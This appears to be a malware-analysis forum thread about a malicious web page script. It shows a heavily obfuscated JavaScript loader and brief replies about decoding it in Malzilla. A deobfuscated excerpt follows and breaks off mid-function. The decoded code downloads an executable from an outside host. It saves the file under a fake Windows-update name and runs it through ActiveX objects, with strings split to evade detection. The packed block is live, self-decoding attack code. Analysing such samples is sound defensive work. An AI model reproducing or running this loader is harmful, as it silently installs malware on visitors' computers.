var uaigei=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,44,21,55,40,22,1,53,39,38,0,0,0,0,0,0,20,42,0,37,3,54,15,4,36,11,12,59,10,32,58,9,19,16,25,26,28,51,48,24,7,49,56,0,0,0,0,0,0,5,8,52,14,17,2,27,18,43,47,13,41,45,30,31,29,50,57,33,35,6,23,62,61,60,34);var lszxla="osc5OV75aesD672vRks6uZHeur@eJeBhXs@eQkaPX4ceuZGPpY@@JpBPeYHaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYDJesDhJqvbm2fSYChLYH5SeeuhJqvbm2fJaaPTm2e@V75aOMDWZMGtyGvXl@vBRceO4E5Js@vJR5Bu2VeBb7bosc5O1aaXY2eaOYbpma@hmaaupMSgYGhpYHRIkGPL72BX6B2Ls@vLa@BJ6M@@kfQFaBfg6M@pma@hmaaupMSgYGhpYHRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc6AmaPb7aP9mcQJl@v6T@6I1Q6I1BB@lGhpl@Q6VGBhea2tBcP6MV5Bb2vg6C@geseXZuPpREhDYHhpaVfI@VeBQChb7Ch6aBPBba2@kfQFaBfg6M@pma@hmaaupMgJ7CRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc60Y@v9mcQJl@v6TGB@lGhpl@Q6VGBhea2t1aPpY75XaV5BbYb@kqvbm2fgY@5aeYeJr2f4m75b62BIQVfa1BQRmQ6IB@eI@VfpYcfa1VQJmQ6IV@eI@VfLscfa1BPLmQ6IW@eI@Vful7fa1QRsmQ6I4vTI@VfoYcfa1Qg9mQ6I1aPI@Vfu7cfa1Q5JmQ6IB@vI@VfL2cfBbYbFY7eL7aQup@f0R@Bb6M@tyahgCVPSRGabpMSgYGhpYHRIkGPL72BI48hgmMBgY@5aOXucOVfp6cedpVgIbV5JC2eqm6pf1BPN6C5IbV5JC2eql6pf1Be9mcff1aPR2HTpQ8BI4@vI@VfIBVbosc5O4ahResSgYGhpYHR6M@6I4vQIbV5JC2eqY6pf1QeXM55R2GQIbV5JC2eqx6pf1QvBRceIBMGtyahgCVeaeYeT2@ehJqPXsGeJeYfzmuGRGeGpVY6JaaPIbYbFpGhGYGaJxahaaVfFlCeX1uvIbV5JC2eqm6pf1QPrs@v6aVPSRc60Y@vNC7ff1aPR2HTnQ8BIBGhaxEff1aPR2HTeQ8BIcGPgaVuB@VPXsGeJ6VfBbYbpma@hp@e@4E5Js@vJR5Bb2VfH6HhgmMBgY@5aOXGcOVfux@vXGXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@4E5Js@vJR5Bb2VfHmMBgY@5aOXuWQ8BIQ5RgTQTHmMBgY@5aOXuRQ8BIcvormBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBh775QO7eaesSgYGhpYHR6M@6IQEff1aPR2HTWM6pf1BRCmY6NYc5IbV5JC2eqsYucOVfgaXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@TGPnCQTH25Wp725KYG5TYH5paBBhT@eXW@5Jp@BIZugxmQ6JaaPTm2eayGhalaPBb62t4Ghpl@Q6VGBhmaPpY75XCQuhQa2@e7bX2c6SYcekaVeT2@eBbYbgmGaX2c6gYH5RRceSYcSu7G@hJqvbm2feesSgYGhpYHR6M@6IMEff1aPR2HTW46pf1QgipMnpmMBgY@5aOXupQ8BIMGeIBMGtG76x625Je6uhJfPos@e61Q@XQEff1aPR2HTWV6pf1BP@4sGepMRIbV5JC2eqsYXcOVfXaBBhG76wm7ff1aPR2HTWZ6pf1BP617hBbe@X4XhIbV5JC2eqsYucOVfxRcPIbV5JC2eqm6pf1BP6ycebeGPa16Bh4ahRpMn6mMBgY@5aOXXcOVfaY5@IbV5JC2eqr6pf1BvpY@BFpGhGYGBh1BBhJq5J7avgp@fWbYb@kqPTpHhp6HeXCBeksHh6BM@tyahgCBQ@HsGtyahgCQvbmCPJ7aaXYHvOME5gsG@61VSm6YXAY6Xo1MBgY@5aOvucOVfoV6SSQBuWc5uGBeGSMu6RHsSRcYgAm6G1lYXI@Vf4muGilugm7Eff1aPR2HTRQ8BIV9SnVu6pZ6gWQBGS1YuGc5X4m6uRy6unM6uo1Q6IHeuRyYgR4suIbV5JC2eqC6pf1QuRHeuGHeuRH66ACeuRQQuRHeuRHeuRHeupyYfa1QuRHYXjCsu4mMBgY@5aOvucOVfRHeuRQQuRHeuG45uRH66RHeuRHeuRHeuRcYXI@VfoVHugHsXRMcff1aPR2HTRQ8BIZYXocG6pVGPoQQGnBshGcHhWyGhQMePgyHhS1Q6IyeXWc6XW1YSIbV5JC2eqC6pf1VSQZeGGc6XWcu64CegeQVgAx5gjlsu1asuS4Efa1MXjYYSnyEXS1MBgY@5aOvucOVfjCYXjeQXS46uGG6Sgy66S46G1CsuAC6S1legI@VfRysXg46gRBYff1aPR2HTRQ8BIy5XAm66p4sheQQGSVeGGH6Gjl5gWcESRZYXo1Q6IysuQy9XgVYgIbV5JC2eqC6pf1BuimegGceGSM6646YgmeQGnceGpZYXe1euWHYfa1VS4C6ueV6GQ1MBgY@5aOvucOVfWcESSQQXpyGGGGsui766py6upVeXAaeXix5GI@VfmCsSRZegTyYff1aPR2HTRQ8BIZsSoB66p4YgWQVSpM5uG16XjY6SWMYg4muuQ1Q6IV5GAl9Sm7EgIbV5JC2eqC6pf1MS4meGGc6Go1G6iC6XRQVXACsXA6YXgcsXo1EfaTGva2GBhJzv66@eJaQvbmCPJ7CTBeXBhkqvbm2fbeYeT2@ehJfh@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJfhX4aPps5vpmaQIY2vJaV5JC2eqseGcOVfblC5B7cfa1aPR2HTWG6pf1M5B7cGIbQvbmCPJ7CTBeXBhJfQFaBhBb2vg6C@osc5O1GaAmaPb7aP9aBha1Mn6mMBgY@5aOXXcOVfapBSRC2eBmMBgY@5aO3XcOVfp6HeXmBBhBcP61GBh6cP6Z9e6MGBB1aPpY75XCBuhQa2Ls@vLa@BJ6M@@e7bBOMBhJf2tQ7bBx@BG7GhLaBBBHM5TlHhJlC5@MsGtBcP6MM5TlHhJlC5Bb7bkRHhTeGPX776nmaQpY@BI@s5LmaQR72fascedYahdYGa!m9nLmaQR77a7m2pXmMBtZMnJ72fJ2GPGeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIrMBgY@5aOvXcOMDL77fBZMBI@357pcffJzDFpGhGYGaIbESQHeGTMeGXV@@JmMDf1Qpg23eIbVbdV@eJec6SY@v472vg6chT7aPO1BQkmQ6IV@eJecfdbVf7m2pXmMBtZBPaYGeX4aPps5vpmaQIY2vJCVfdbV5JC2eqseGcOMDblC5B7cfa1MDf1aPR2HTWG6pfZM5B7cGi7uGo4uXTysDf1aPR2HTRQ8Bdy6X4l66WMegRQBGe46SGHeuACeXjlEuQV9uo1MDf1Qpg23eIbVbd4XPpCMeIkGaJ2GPGpMSgYGhpYHRIkGPL72BI4vQdbV5JC2eqY6pfZQeXM55R2GQdbV5JC2eqx6pfZQvBRceI@VfIBMDf1Qpg23eIbVbI4XPpCVeSCaaumcQXTuhGYHnRsHhJaVuRBQpg23eIbVbd4XPpCQ5XeGaXl25XHXhglaP8sGeJaVfN6aeIR@eXc2vFmBBdbVf7m2pXmMBtZQvGCaaNC2eB72BRpGeXHXhpa@6I@vpI@B6W@BuBZMBI@357pcffJzDRs@v6eevGC2BRBQfFHVf723fOyQfOcaeRaBuBHVDO1Qp7mMDf1Qpg23eIbVbIycebeGP@Hahpa@fFHVPXsGeJ2357pcffJzDSY@vOc25WC2P@4E5Js@vJREhDYHhpaVfH6HhgrMBgY@5aOXGcOMDux@vXGXRdbV5JC2eqseucOMDx7vnIBMDf1Qpg23eIbVbdBGQWYaapCa5R7c69CaPXaVf0Y5oI@BPeYGvg2@6RBMDf1Qpg23eIbVbIc25WC2PX4XPX7@BB@357pcffJqf9p@f1m75um2fKYH5TeGPOTuPe72pg23eIbVbIVHPS62QueevRs25kpV5Jl25upH5Jm9ek62pg23eIbVbd4XPpCBhLxa5Wm25@V@eJec6AmaPb7aP9mcQJl@v61MnLmCDf1aPR2HTWQ8BdcaQXrc6jrMBgY@5aO3ucOMDJlX@SrMBgY@5aO8ucOMDGREhdbV5JC2eq76pfZMhpmQ6I1BBdbVf7m2pXmMBt1MnJ72ff2@P@MHhosa5gC76AmaPb7aPxY@@pxuQaY@BFpGhGY@6Oc3nyYuB7m2pXmMBt1Qeu77@ueGaCYceiaBPdla@6RGB7m2pXmMBt1Vgum2fDe6uOc8eO@HepkCeG2357pcffJqfR2HQul2e@QuQkm5BJrH5QaHeaJ@6WBQpg23eIbVbIMahGC2ee7Ga4lChiaQ5aOHeS2GB7m2pXmMBt1MQa7c6wmaQpY@BAac56MahGC2ee7GBB@357pcffJqf8Y@@p2357pcffJqff2@PX45eulaP7m2pXmMBtZMnJ72fQ6@5pe6PaYGeX4E5Js@vJREhDYHhpaVfwl8hgrMBgY@5aOXucOMDppMn6rMBgY@5aOXXcOMDamQ6I1BBdbVf7m2pXmMBt1MRXCBggmCegCVnJlavGY@f8Y@@p2357pcffJqfQ6@5ppVnIbV5JC2eqs6GcOVfOycebeGPaMe6js5RNY5pg23eIbVbd@epu4Chg6@5ppsDBbYb@kqbBx@Bb4avLlGPSlaBhkfPeYGvg2GaTm2efZBGdbYbkRHhTeGPX776nmaQpY@Bd@seIkGPL72fL2GhSlaQkeYfL2H5B7cGTBegi75g4x66QM5GRQQXgM5XG15Ggc66Q19STHsSAssXgyuXIHBQkeYfpYH5pmVa2WMeIkGPL77adBMGtc75QO2vJl2vXc9enp@eus@Pj6@eJaBPeYGvg2@6ITV67232pe@5RHeuWTBPeYcfa1QuI@VfR1BBhcHeLYaeJp@vX@HeLs@vBRce@1BPeC2eu6@vSRQ@QTQ56CCaPYcepY75Be6uIb62Ls@vLa@BJ6M@@kf2tJqvbm2fXR@5@ZBGRZQ6XRHh@ZQuArQ6SlcP@ZVgdbYvbm2fSaGPa2HhuesDJVaXpVESJVCXTGYSJV2GilsSJVCuTZeXJV2uSZeGJVaXoyuXJVCXoGYSJV2uS1eudbVbdVBvS4YgTVBvpBsSQVBv475XWVBvmm9uSVBvRy9uoVBvWcYS1rMBdVBvSGYueVBvncYggZMBtZBDTluuRG6DTCegAmuDT7uSR46DTYESpH6DTlYS1xuDTr6Xmx9DfZBDTY6g1r6DTY6ge19DfJzDJV2uS1eXJV7Xoc5gJV2uAaYSJV2Gi7YSdbMDJVauAY6gJV2gmCsuJV2upGYSJV2uSGYSdbVbdVBvAlsSTVBvn1sXTVBvocEXAYBvoVEXjYBvocYu1YBvo4EXAYBvgV@uRVBvT4EuJrMBtZBDTm6PnVGDTreGoV6DTCeuoV6DTl5uS46DTCsuoc6DTleupH6DTCsSnG6DT7eue19DfJzDJV2GiCsSJVauAreuJV2Gis5gJV2ueceuJV2uQVESJV2XRGYSJV2GmleXJVCXA7eudbVbdVBvpHeGiYBvQVsuAYBveVESjYBvRV5X1YBv1a6gAYBvjx5GpVBvjxEgjYBv1l5GSZMBtZBDTasuRc6DTmeXg4uDTxEgS4uDT66XmC6DTmEgTH6DTs6SSy6DTreugy9DfZBDTxYg1asDfJzDJV7gjx9Df4ChFOMDJV2GixEgJV7upVeXJV2Gmx9SJV7S4YYuJV2gilsudbMDJVaXSVsuJVagiYYudbVbdVBvT4YupVBvmCYgjYBvixuXmYBvjYuGeVBvRV5G4rMBdVBvT46geVBvjxEgdbM5LxHBdVBve4YgjrMBtZBDTCeX1luDTmsSe46DTxYugc6DT75ujxuDTr6gix9DfZBDTYEuma6DTY5Gn46DTxEgpHsDfJzDJV7gjxEgJV7gjYYuJVagec5uJV7gj79XJV7gjxEgJVCXpyeGJVCXRZeXJV7ujl6SJV7Xn1YgJV7XjxYgJV7XAxsXJV7umx6XJV7X1x6uJV7XAx6uJVCX4r6GJV7u1x6XJV7X1xsuJV7Xn1YgJVCXpy6XJVCXey6XJV7u1x6XJVCXey6XJVCujx6XJVCumxYgJV7uo4YuJVCumreXJVCug46uJVCuR4YuJVCuR4suJVCuW46GJVCuR46GJV7XQ1YXJVCuW4egJVCuo4suJVCuQ46XJVCup4suJVCue4eGJV7uo4euJVCumx6XdbYbHJfQFaBfSYChLYH5S6M@HJqvbm2fumcQ@TGva2HGHJhvg6C@HJzeIkGakRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGHJzeIkc6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cG1l5XpcsSix66SV9X1eQXey6XG1uuAl66Rcugn16gjl6GilYgIBMGHJfQFaMeIkGBheqbosc5OQG@S775BpHP@V7eJlChbCaP642QJ2@eLRHBIVBvSZsuW1BBhQqbosc5OGchSeeueseuRHeuR@M5Slaa6mH5GGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCQQIeeBRG2uLCshR4@uLeQQIlaBuGchSO6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCM5Se6eQxahgO6OtZ2QB2GP64C5X@GPXr@v6kVu24C5S6M5SOBaSlCGHJz5Ses5SpM5TmH5pmaQXr@BR@M5SlC6gBMGHJqvbm2fGeYeJr2f4m75b62BBb6OtyHegaBQ@HsGB2eQIO6QfbBBGOXQces5SOBeQl2vg6cedO6OtJaaHs@v6pMhJ6@e6He@R4@uLCshR4GBhQqbPeePulGvGYceppM5LmaQR7C5qC6pX4c5Js@vJl9eX775u2cnbpHPJaBBX@GPXr@v6O6OtQaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bumcQ@cHeLYaeJp@vXZ75B7aP6ZQaBxc5beGPO475LeYfJa25aRGQplC6esYuIpQ56CCaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYfOZaQk72Q@Hef6YGQda@v@HYa2WBQFmahGYcadBMGtQ7btQqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtWchDeePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtWchDpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkkYujYeXgMEu1mMBgY@5aOXucOVf179SQQQXix9XGGsSis66eZsSQB6uQy9Xj6suIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJVCuS46udBMGHJqvbm2fG67vbm2f@HBvXYH5Ls@5JaVfJV7ffTHeLOVeulHBIVBvIbVeulHBXRHhBb6OtyahgCVhI2HeLO@f@HBeQxahgO6OtyahgCM5SCahLY@f@HVuRHMBOQG@S775BpHPX@GPXr@v6O6OtZ2QB2GPOGVhI2HeLOc6aYced72QO@efSl25blGPBHVhI2HeLO@ffQefIm@eulHQhQqbosc5OychaRHhfCBaO1chaRHhfpM5TmH5pmaQXr@BR@M5SCahLYGBhQqbosc5O1@eulHQOQefIm@eulHQX4avIl2vg6cedaQua1chaRHhfpQeJpHPpa@fGHM5SCahLYGBhQqbnaGQaY@f61@eulHQX@GPXr@v6CMBO4C5RsHhJCQaOHe@pHeuRH6BO1@eulHQOQefI2HeLO@ffHVhaRHhfCMBOychaRHhfO6OtyahgCBeJe@f@HVeJr2f4m75b62BBb6OtyHegCQBBeeuhHBQ2ceuRbefBOMBBHBeJeHTBeXaI2HeLOHBG6C5pmaQXrHGHJqvbm2fIY7POQefdZMGHJzv66@eJCQBIY7PX@GPXr@v6CQaO4YuBHVhTx@f@HVhTx@ffHBvXYH5Ls@5JaVfJ1MBXRHhBb6OtyahgCBeOQefdZMGHJfeOQefumcQX49eXlCeaYHGHJzeIkc6ARceSR@eJCBaO1GvFO6OtWchDpMSupH5u2GPOQefGO6OtQ@f@HMeIkc6ARceSR@eJO6OtWchDpMSupH5u2GPOQefIY7PhQqbumcQX49eXlCeaY@f@HBehQqb@lGhpl@Q6VGBheaOtQaOtQqbBx@Bb4avLlGPSlaBhkqvbm2fpsc5dY@vWQePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBbYbpsc5dY@vWTM5J7aSp775BmGvpY@BI4@eblC5B7cfa1MhalaQkkegAYEujaYSWQBST1euGM6um766ey5gRQQuRc5uirsXSHYunZYfBbYbosc5OcahgrGPpm6akRHhTeGPX776LmaPb7aP12GPGYcepaVfumcQJl@vIBMGtcahgrGPpmY6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGQc9uQ1YuSVu64Y5G1eBuWc5XGGYgml66RHegR19Xn4eugZsXIBMGtyahgCBeQl2vg6cede6vXYH5Ls@5JaM56Y@ealHefZBDTleuSMsDBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPI2HeLOGaG67vbmCGtyahgCM5al25blGP@1eufQG@S775BpHPX@GPXr@v6OYbnaGQaY@BI6HPI2HeLOc6aYced72Q242eSCahLYGBI6HPI2HeLOHB@1GQdm@eulHQhJqvbm2fF6@eam@eulHQ@1GQdm@eulHQX4avIl2vg6cedaQua42eSCahLYGBhJqvbm2fI2HeLOGaI6HPI2HeLOc6SY7hS775BpHP6He6I6HPI2HeLOc6aYced72QG42eSCahLYGBhJzv66@eJaVhaRHhfpQeJpHPpaHBS2H5RsHhJ2eue7euRHeuB1@eulHQ@1@eulHQf1@eulHQfyGQa2chaRHhfOYbosc5OQGPGRc5QeYeJr2f4m75b62BBbYbFRc56GaaRbe@2GeuRbe@fbBBGYGeuma@qaap@1@eulHQfQG@S775BpHPhJqhTxcPJmaaI@v@RMcfhJfhk7@f@HVhTxcPJmCBIY7PFYc5f1GvFxGPgOVhTxcPJmCGtZ2QB2GP61GvFxGPgpQeJpHPpa@aTHeuRBVhTxcPJmCB@M@PkOYbpma@h7ahgrGPpsY6SYc5oYc5@1GvFxGPgOevbmCPJ7auXBceB7aQb2GQPY@BBbevbmCPJ7auX4aPX7@BBQChb7Ch6aBPBba2tc75QO2vbmCPJ77uX4aPgxaPgeYhTxcPJmCGpsc5dY@vgTV5JlGPBxaP6BMG@lGhpl@Q6VGBhe7b@kqbBx@Bb4avLlGPSlaBheqbosc5O1aPR2GaXYHvOME5gsG@61MhamQ6IQVfBb6Otc75QOaOtZaQXkaQReePulGvGYceppMhgYGhpYGgaYGeJp@v61MeIkGPL77fBb6OtZaQXkaQRpM5J7aSp775BmGvpY@BgY@5aOvucOVfblC5B7cfa1aPR2HTRQ8BI4aQkk6SRB6S1xeGjmMBgY@5aOXucOVfiseXmeQXSV5gG19XW466is5XW4YgR4eXQHeXIBMGHJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4eGdBMGHJqvbm2f6l2vus@PkmaaRG2uLCshR4@uLO6OtyahgCQQIlaQPYGaRG2XRHeuRHsGHJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBb6OtyahgCBeQxahge6vXYH5Ls@5JaVfJV7ffTHeROVeuCCBIVBvIbVeuCCBXR@5Bb6OtyahgCVhBrch@QG@osc5hQqbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhQqbI6HPIeYhBrchX4avIl2vg6cedaQua425S2H5BkaPu16BhQqb6m@eulHQSeeB6l2vus@Pkma6RG2XRHeuRH6BuGchS6c@JO6OtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGHJqPum2Bosc5OBGaRb6Q2GchaRHhflCGBOMBBQGPGRc5QOXQceYhBrchfQG@S775BpHPhQqbosc5OcaPS7aadZMGHJqPum2BBe6uhB@ag46uhBHBfBQvJl2vfQsD4rMGHJhvJl2vfQYf7a2uL2v@R4@peCsh7a2uL2v@R4@peCsh7a2uLmMGHJhvg6C@n6ceP6@5X4E5Js@vJpuPnx9ea7GPgxE5uecRbeGP6caPS7aB@lGhpl@Q6VGBheaOtQChb7Ch6aBPBba2HJf2HJfOtBcP6MM5TlHhJlC5Bb7bosc5O1aPR2GaXYHvOME5gsG@61QvBmQ6I1cQIBMGtc75QO7bosc5OcaPS7aaJxahaaVfXYHvOM9hIbV5JC2eqC6pf1VvJa8RIbV5JC2eqs6pf1BPL72BdMXvBlHQx6GeJpBnT6Hhf7XQGYHDB1BBhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sXdBMGtyahgCQQS7Ceb7@PgeeueCshR4@uLCshhJqvbm2f6mH5BkaP@He@pHeuRHeuhJqvbm2fSCC5alaQPYGa6mH5BkaPGGBeQl2vg6cedpQeJpHPpacBgbQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fI6HPIe6eQxahgOYbnaGQaY@BI6HPIpQeJpHPpacBg@s5Rl2eS6c@J6VhBrchfQYhBrchhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqhBrch@1GQdmc6SY7hS775BpHP6He6SCC5alaQPYH6gBMGtyahgCBeJeHeg6aaXYHvOME5gsG@6BMGtyHegaVvbm2fBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@1GQdmHBG6C5pmaQXrHGtcHeLYaeJp@vXZ75B7aP6ZQaumcQJl@vO45R4l8nM7uaI4@eS6@PPHYuixEuTcuXGGsSWZ66p1EuSQVSAaeuGc9upGeG4m5gmlEXimVa2HahgsGeOTGhGYGaI475LmQfos@eTYGaIV@@R2HeB7C5uGCXIpQ56C7fv@e5bmahGCVebeGP@1BhT7CeR2GhQmQfos@eTYGaIc75TYcfv@e5bmahGCVebeGP@1QeuR@5IHVvb2GvJeYfFs@eSYcfv@e5bmahGCVebeGP@1Mhup@vgR@eaYc5IHVvb2GvJeYfpmavJmVa2WMeIkGPL77adBMG@kzhb7Ch6aBPBba2tQ7btBcP6MM5TlHhJlC5Bb7bpma@hkqvbm2fumcQ@cHeLYaeJp@vX4c5Js@vJY5eJeGPX72BIWchDYHhpmBBhJzeIkc6SY@v472vg6chT7aP61MhasH5S6@PI@VfL2H5B7cGWHeun1sS1lu6e49SWQBuWcuuGBeGoVu6RH6SR4uGTVYSp16gIBMGtyahgCQQS7Ceb7@PgeeueC6XRVeuTH6XhJqvbm2fG6C5pmaQXrGaTpGPSlGhRY@BSaGPa2HhuOMDJV7uR4sudBMGtyahgCQQIlaQPYGaRG2XRHeuRHsGtyahgCQ5alaQPYGaG6C5pmaQXrc6aYced72QD1sGtyahgCM5Rl2eS6c@JeeQIlaQPYG66H2eS6c@JOQueleGBbYbosc5OQG@osc5@V7eJlChbCaP61BDTmMBXR@5fTHeROVfJV7ffTHeROVeuCaBhJqvbm2fSCC5ae6eQxahgOYbnaGQaY@BSCC5apQeJpHPpacBg@s5Rl2eS6c@J6M5Rl2efQs5Rl2ehJqvbm2fSCC5aes5Rl2eX4avIl2vg6cedaQua425S2H5BkaPu16BhJhQI2HeLOH5@GQQS7Ceb7@PgeQue7euRHeuRBM66mH5BkaPhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2BBeeuhB@a6m@eulHQSO6QfbBBGYGeuma@q6Gp@425S2HBG6C5pmaQXrHGtyahgCM5Sm2v@ZQfGY@v6R@P@1MDhJqPum2BBeeuhB@aWHeXSZsGBOMBB4C5g7CB@ZVDLG2uTH6XhZMGtcHeLYaeJp@vXZ75B7aP6ZQa67aeaCQ@G2ceSkYv@1BvgpcGSl@QJeGhSeBeBlc5ulCeF7a6LRGePyaeamVa2WchDYHhpCBQkeYf!e5RKYcekYc5IHMhasH5S6@P@1MSClXWmk6uRHsXg4ugAeQGAluuGM6ums66QGYX1eQuRM5uA66XT15XgVEfv@s6umcQJl@vv@s5p62eJpYv723GDb7hJaGho6Hegk6vg2@BLyXRCmXPX7GPg6MG@2s6S7a@aYca2y7GgYHhpCM5p62eJeYfn6@PpacGW1euR7CG6YGQda@vPGeuR77fOyGQa2Hhu2HegeYfgY@PITeaokYPB2@edbM5Sm2vfZVfv@s6okY5Jl@vv@s6okYPB2@evZBBhJf2Ls@vLa@BJ6M@@kf2tJfQFaBfSYChLYH5S6M@tyahgCV5JC2e@TGPnCBSgmahQaVfJmcfa1BQJmQ6IW@eI@VfLRcfa1BPpmQ6I@GQIBMGtc75QO7bosc5OZ7vF6GaIZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXZ3ff1aPR2HTRQ8BIy3ff1aPR2HTWQ8BIZ7gIbV5JC2eqm6pf1QPJmaWIbV5JC2eql6pf1VeXMYfhJqvbm2fnx7PBRGaXYHvOM9hp6cvJa8RIkGPL72Bnx7PB6MGtyahgCBeQl2vg6cedesDJVCDfTHeROVeuCCBSaGPa2HhuOMDJV7uR4YudbYbnaGQaY@BG6C5pmaQXrc6aYced72Q24eun16BG6C5pmaQXrHB@1BDTmMBXRHhfTHeLOYbG6C5pmaQXrGaTpGPSlGhRY@BG6C5pmaQXrGBhJqvbm2fG67vbmaaTpGPSlGhRY@BIVBvIbVeulHBXRHhBbYbosc5O1GQdmGaG67vbmCGtZ2QB2GP61GQdmc6aYced72Q2QeueseuRHeuRBVhBrchfQYhBrchhJqvbm2fGYGeuma@@TGPnCBSgmahQaBBhJqPum2Bosc5OBGaRb6Q2MYuRb6QfbBBGYGeuma@q6Gp@1GQdmc6SY7hS775BpHP6He6RGauRHeuRH66G6C5pmaQXrc6aYced72QBbBeQl2vg6cedOYbFRc56yahgCBQ@HsGB26uR1eXhBHBfBM@tyahgCMvoxGQueYeJr2f4l@vBxaPYREhDYHhpaMvoxGQBbYbJxahaaVfpma@hr7vF6HeX47ff1aPR2HTpQ8BI43ff1aPR2HTTQ8BI4GP6He@nycPFxcPFY@6R@Qua1eugM6uoMeueBMG@lGhpl@Q6VGBhe7fBbYbosc5OZ7vF6He@TGPnCBSL7aQoY@T9mcQJl@v6Z7vF6GBhJf2tQChb7Ch6aBPBba2tQ7btB";var vibqt=13886,uwchr,pxhy,gyyqwo='',hgkmmtap=xlkxqsz=ruleddw=0;for(pxhy=14;pxhy>0;pxhy--){for(uwchr=Math.min(vibqt,1024);uwchr>0;uwchr--,vibqt--){eval('ruleddw|=(uaigei[lszxla.charC'+'odeAt(hgkmmtap++)-33])<<xlkxqsz;');if(xlkxqsz){gyyqwo+=eval('String.fromCha'+'rCode(41^ruleddw&255)');ruleddw>>=8;xlkxqsz-=2}else xlkxqsz=6;}}eval(gyyqwo);
-
Same here :( (confirmed on XP SP2 and SP3)
-
Which option you use for eval() (replace, override, leave as is)?
It works fine for me here with "leave as is".
Do you have enough free space on partition, as this script require a lot of free space (>100mb)?
Is the "eval_temp" folder present in Malzilla's folder?
-
Here is the script after deobfuscation:
var url='http://google-analyze.cn/getexe.exe?o=2&t=1220309190&i=1365934880&e=';
var success=0;
var exeurl=url+'1';
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
var repl=new Array("-","ip","il","te","je","el","ca","ec","ol","os","LH","SX","ve","DO","re","od","pe","it","cl");
function Go(a){
var fso=a.CreateObject("Scr"+repl[1]+"ting.F"+repl[2]+"eSys"+repl[3]+"mOb"+repl[4]+"ct","")
var sap=CreateO(a,"Sh"+repl[5]+"l.Appli"+repl[6]+"tion");
var nl=null;
fname="KB908845.exe";
fname=eval("fso.Bu"+repl[2]+"dPath(fso.GetSp"+repl[7]+"ialF"+repl[8]+"der(2),fname)");
try{nl=CreateO(a,"Micr"+repl[9]+"oft.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.XM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=CreateO(a,"M"+repl[11]+"ML2.Ser"+repl[12]+"rXM"+repl[10]+"TTP");nl.open("GET",exeurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",exeurl,false);}
catch(e){return 0;}}}}
nl.send(null);
rb=nl.responseBody;
var x=CreateO(a,"A"+repl[13]+"DB.St"+repl[14]+"am");
x.Type=1;
eval("x.M"+repl[15]+"e=3;x.O"+repl[16]+"n();x.Wr"+repl[17]+"e(rb);x.Sa"+repl[12]+"Tof"+repl[2]+"e(fname,2);sap.Sh"+repl[5]+"lEx"+repl[7]+"ute(fname);");
return 1;
}
function mdac(){
var i=0;
